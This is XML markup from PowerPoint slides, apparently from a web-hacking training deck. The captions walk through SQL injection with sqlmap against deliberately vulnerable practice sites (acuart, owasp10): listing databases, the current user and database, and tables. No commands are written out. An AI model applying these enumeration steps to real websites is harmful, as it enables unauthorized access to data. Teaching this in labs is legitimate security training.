            <a:ext cx="9143998" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Google Shape;1450;p210"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5436096" y="1653648"/>
            <a:ext cx="2656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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Payloads executed</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1451" name="Google Shape;1451;p210"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-862" y="1411023"/>
            <a:ext cx="9055500" cy="1538700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat"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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1452" name="Google Shape;1452;p210"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3329862" y="4161443"/>
            <a:ext cx="4266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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Columns available on the acuart database</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1453" name="Google Shape;1453;p210"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1871700" y="4299942"/>
            <a:ext cx="1458300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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211"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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187</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1459" name="Google Shape;1459;p211"/>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460" name="Google Shape;1460;p211"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5814138" y="2571750"/>
            <a:ext cx="2656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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Payloads executed</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1461" name="Google Shape;1461;p211"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21196" y="2057942"/>
            <a:ext cx="9000600" cy="2295900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat"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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1466" name="Google Shape;1466;p212"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5544107" cy="5143501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1467" name="Google Shape;1467;p212"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4929188" y="214313"/>
            <a:ext cx="1543200" cy="2055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188</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p212"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734018" y="0"/>
            <a:ext cx="4411553" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1469" name="Google Shape;1469;p212"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1007604" y="3057834"/>
            <a:ext cx="1674300" cy="270000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FDD20F"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1470" name="Google Shape;1470;p212"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2681790" y="2915820"/>
            <a:ext cx="2656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rgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>User details </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1471" name="Google Shape;1471;p212"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5768625" y="2803010"/>
            <a:ext cx="3294600" cy="648000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="00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1" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1472" name="Google Shape;1472;p212"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6192180" y="3273660"/>
            <a:ext cx="1728300" cy="1188300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3E3E3E"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxn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175" y="934948"/>
            <a:ext cx="7284378" cy="4135062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873303" y="328773"/>
            <a:ext cx="7661072" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now we will attack with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> on this website, we have seen how to do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> injection manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>n this website </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2040419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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="Google Shape;318;p50"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HTTrack is an offline browser utility, allowing you to download a World Wide website from the Internet to a local directory, building recursively all directories, getting html, images, and other files from the server to your computer.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="636363"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HTTrack arranges the original site’s relative link-structure. Simply open a page of the “mirrored” website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="636363"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="319" name="Google Shape;319;p50"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="62013"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3821650"/>
            <a:ext cx="9144000" cy="132185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257" y="1109610"/>
            <a:ext cx="8270696" cy="3893905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462338" y="349321"/>
            <a:ext cx="8156400" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command you can see in fig all the exploit it is listing , vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , file inclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38379311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5770"/>
            <a:ext cx="9144000" cy="3965613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="565079" y="400692"/>
            <a:ext cx="3169457" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here it shows username is vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10265094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3433"/>
            <a:ext cx="9144000" cy="4243015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22051410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7416"/>
            <a:ext cx="9144000" cy="3903968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="359596" y="421240"/>
            <a:ext cx="1726755" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> using --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dbs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216048385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3981"/>
            <a:ext cx="9144000" cy="4191645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17624536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4948"/>
            <a:ext cx="9144000" cy="3996436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400692" y="369870"/>
            <a:ext cx="2382383" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using –current-user</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323175679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6866"/>
            <a:ext cx="9144000" cy="3924517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462337" y="421240"/>
            <a:ext cx="2983509" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See it shows current user as root@</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="244500502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0288"/>
            <a:ext cx="9144000" cy="4171096"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441789" y="287676"/>
            <a:ext cx="2133918" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using current-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292572658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9060"/>
            <a:ext cx="9144000" cy="3842323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606175" y="482885"/>
            <a:ext cx="2970685" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>See it show current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as owasp10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249282322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0562"/>
            <a:ext cx="9144000" cy="4016983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554805" y="297951"/>
            <a:ext cx="3278462" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command to see tables in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> owasp10</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4137902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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1358663"/>
            <a:ext cx="8520600" cy="3210300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
